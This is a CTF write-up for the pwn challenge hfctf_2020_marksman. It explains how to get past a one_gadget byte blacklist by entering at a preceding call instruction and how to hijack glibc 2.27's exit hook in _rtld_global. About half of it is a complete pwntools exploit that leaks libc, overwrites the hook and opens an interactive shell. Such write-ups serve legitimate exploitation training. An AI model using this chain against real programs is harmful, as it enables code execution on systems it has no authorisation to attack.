Adjusting one_gadget and hijacking exit_hook: hfctf_2020_marksman

    New technique learned from this challenge: hijacking exit_hook.

    Analysis

    First, open the binary in IDA.

    The binary starts by printing the address of the puts function,
    so the libc base, and therefore the one_gadget addresses, are easy to obtain.
    But the binary contains a check function, and every gadget reported by the one_gadget tool is rejected by it.

    // Decompiled by IDA: the target address is rejected when its first two
    // bytes match one of the blacklisted opcode patterns.
    signed __int64 __fastcall check(_BYTE *target)
    {
      if ( (*target != 0xC5u || target[1] != 0xF2u)
        && (*target != 0x22 || target[1] != 0xF3u)
        && *target != 0x8Cu
        && target[1] != 0xA3u )
      {
        return 1LL;   // allowed
      }
      puts("You always want a Gold Finger!");
      return 0LL;     // rejected
    }

    But in IDA I found a call instruction right before one of the one_gadgets. Through experiments, I found that entering at this instruction works:
    call close

    So what remains is to hijack a function pointer so that it points at this gadget.
    The binary calls exit at the end, so we hijack the exit hook. The call chain is:
    exit() -> __run_exit_handlers -> _dl_fini -> __rtld_lock_unlock_recursive
    Overwrite __rtld_lock_unlock_recursive or __rtld_lock_lock_recursive (both are function pointers stored in _rtld_global inside ld.so).
    In gdb:

    exp:

    from pwn import *

    '''
    author: lemon
    time: 2021-01-17
    python version: 3.8.5
    '''

    local = 0

    binary = "hfctf_2020_marksman"
    libc_path = '../libc-2.27.so'
    port = 29614

    context.terminal = ['tmux', 'splitw', '-h']

    if local == 1:
        p = process(binary)
    else:
        p = remote("node3.buuoj.cn", port)

    def dbg():
        context.log_level = 'debug'

    libc = ELF(libc_path)

    def leak_libc(addr):
        # The binary prints the address of puts; subtract its offset in libc to get the base.
        global libc_base
        libc_base = addr - libc.sym['puts']
        print("[*] libc base:", hex(libc_base))

    p.recvuntil(b'I placed the target near: ')
    puts_addr = int(p.recv(14), 16)    # "0x" followed by 12 hex digits
    leak_libc(puts_addr)

    # Function pointer in _rtld_global (ld.so) that _dl_fini calls through when
    # exit() runs the exit handlers; fixed distance from this libc 2.27 base.
    exit_hook = libc_base + 0x81df60

    og = libc_base + 0x10a38c        # gadget reported by one_gadget (rejected by check)
    check_og = libc_base + 0x10A387  # the call instruction 5 bytes before it, which passes check

    # The binary writes exactly three bytes to the chosen address, so only the
    # low three bytes of the hook pointer are replaced.
    p.recvuntil(b'shoot!shoot!')
    p.sendline(str(exit_hook).encode())
    for shift in (0, 8, 16):
        p.recvuntil(b'biang!')
        p.sendline(p8((check_og >> shift) & 0xff))

    p.interactive()


    References:
    https://blog.csdn.net/qq_43116977/article/details/105485947
    http://taqini.space/2020/04/29/about-execve/#栗子
    http://chumen77.xyz/2020/09/28/BUUCTF刷题记录/#hfctf-2020-marksman

    Original post: https://www.cnblogs.com/lemon629/p/14290240.html